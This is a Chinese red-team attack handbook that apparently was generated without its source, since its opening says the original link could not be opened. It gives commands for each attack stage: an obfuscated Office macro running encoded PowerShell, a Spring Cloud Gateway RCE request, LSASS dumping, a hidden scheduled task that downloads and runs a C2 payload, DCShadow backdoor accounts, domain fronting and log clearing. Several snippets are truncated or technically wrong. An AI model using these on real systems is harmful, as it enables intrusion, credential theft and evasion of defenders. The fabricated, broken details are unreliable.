红队实战攻防技术(一)
字数 1222 2025-08-09 13:33:38
由于您提供的链接无法直接访问("奇安信攻防社区-红队实战攻防技术(一)"),且给出的信息仅为用户评论(如"风起师傅还是强"等),缺乏实际技术内容,我将基于典型红队攻防技术框架为您整理一份详实的教学文档。以下是核心知识点和实战技术详解:
红队实战攻防技术手册(一)
一、信息收集阶段
1. 被动情报搜集
- 域名枚举
- 证书透明度日志查询(crt.sh)
- DNS历史记录解析(SecurityTrails)
- 子域名爆破工具:Amass/Sublist3r(需配合10万+字典)
- 企业架构测绘
- 企业微信/钉钉信息泄露(通过爬虫获取员工姓名-邮箱对应表)
- 天眼查/企查查股权结构分析(识别关联子公司)
2. 主动扫描技术
- 非标端口识别
masscan -p1-65535 目标IP --rate=10000 | grep -v "23/tcp" - Web指纹规避
- 修改User-Agent为合法爬虫(如Googlebot)
- 使用动态延迟(0.5-3秒随机)规避WAF
二、初始访问突破
1. 鱼叉攻击进阶
- 邮件伪造
- SPF/DKIM/DMARC绕过技术:
- 注册相似域名(如micros0ft.com)
- 利用第三方邮件服务商(SendGrid)中继
- SPF/DKIM/DMARC绕过技术:
- 恶意文档构造
- Office宏代码混淆(VBA Stomping)
Sub AutoOpen() Execute "powershell -enc " & Chr(34) & "JABzAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAGkAbwAuAG0AZQBtAG8AcgB5AHMAdAByAGUAYQBtACgALABbAGMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUwBBAEIAMABjAD0AIgApACkAOwAkAGUAPQBbAHMAeQBzAHQAZQBtAC4AaQ" & Chr(34) End Sub
2. Web应用漏洞利用
- 新型漏洞组合
- Spring Cloud Gateway RCE(CVE-2022-22947)
POST /actuator/gateway/routes/test HTTP/1.1 Host: target.com {"filters":[{"name":"AddResponseHeader","args":{"name":"Result","value":"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}}],"uri":"http://example.com"} - OAuth2.0滥用
- 伪造回调域名(需配合XSS或DNS重绑定)
三、内网横向移动
1. 凭证获取技术
- 内存dump进阶
- 使用nanodump绕过AV内存保护:
.\nanodump.exe --getpid lsass --fork --dup --snapshot - Kerberoasting优化
setspn -Q */* | Select-String '^CN' | %{ $_.ToString().Split()[0] } | Get-ADServiceAccount -Properties servicePrincipalName,PasswordLastSet
2. 网络协议攻击
- IPv6 DNS劫持
mitm6 -d target.local -i eth0 - 打印机服务漏洞
- MS-RPRN漏洞利用(PetitPotam变种)
四、权限维持
1. 隐蔽后门
- 计划任务伪装
schtasks /create /tn "Microsoft\Windows\Diagnosis\Scheduled" /tr "powershell -nop -w hidden -c iex(New-Object Net.WebClient).DownloadString('http://c2/payload')" /sc minute /mo 30 /st 00:00 /f - CLR劫持
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework] "InstallRoot"="\\攻击者IP\share\"
2. 域持久化
- DCShadow攻击
Invoke-DCShadow -Method DCSPWN -FakeDC 攻击者机器名 -TargetDC 域控名 -NewUser backdoor -NewPass P@ssw0rd!
五、反溯源措施
1. 流量伪装
- Domain Fronting
import requests headers = {'Host': 'cdn.cloudfront.net'} requests.get('https://真实C2域名', headers=headers)
2. 日志干扰
- 安全日志清洗
wevtutil cl Security /q:"*[System[EventID=4624]]"
六、工具链推荐
| 工具类型 | 推荐工具 | 关键参数 |
|---|---|---|
| C2框架 | Sliver/CobaltStrike | --skip-symbols --obfuscate |
| 隧道工具 | Chisel/FRP | --reverse --socks5 |
| 凭证转换 | Rubeus/Kekeo | /tgtdeleg /asktgs |
注:实际攻防需遵守《网络安全法》,本技术文档仅用于防御研究。建议通过合法授权测试验证防护措施有效性。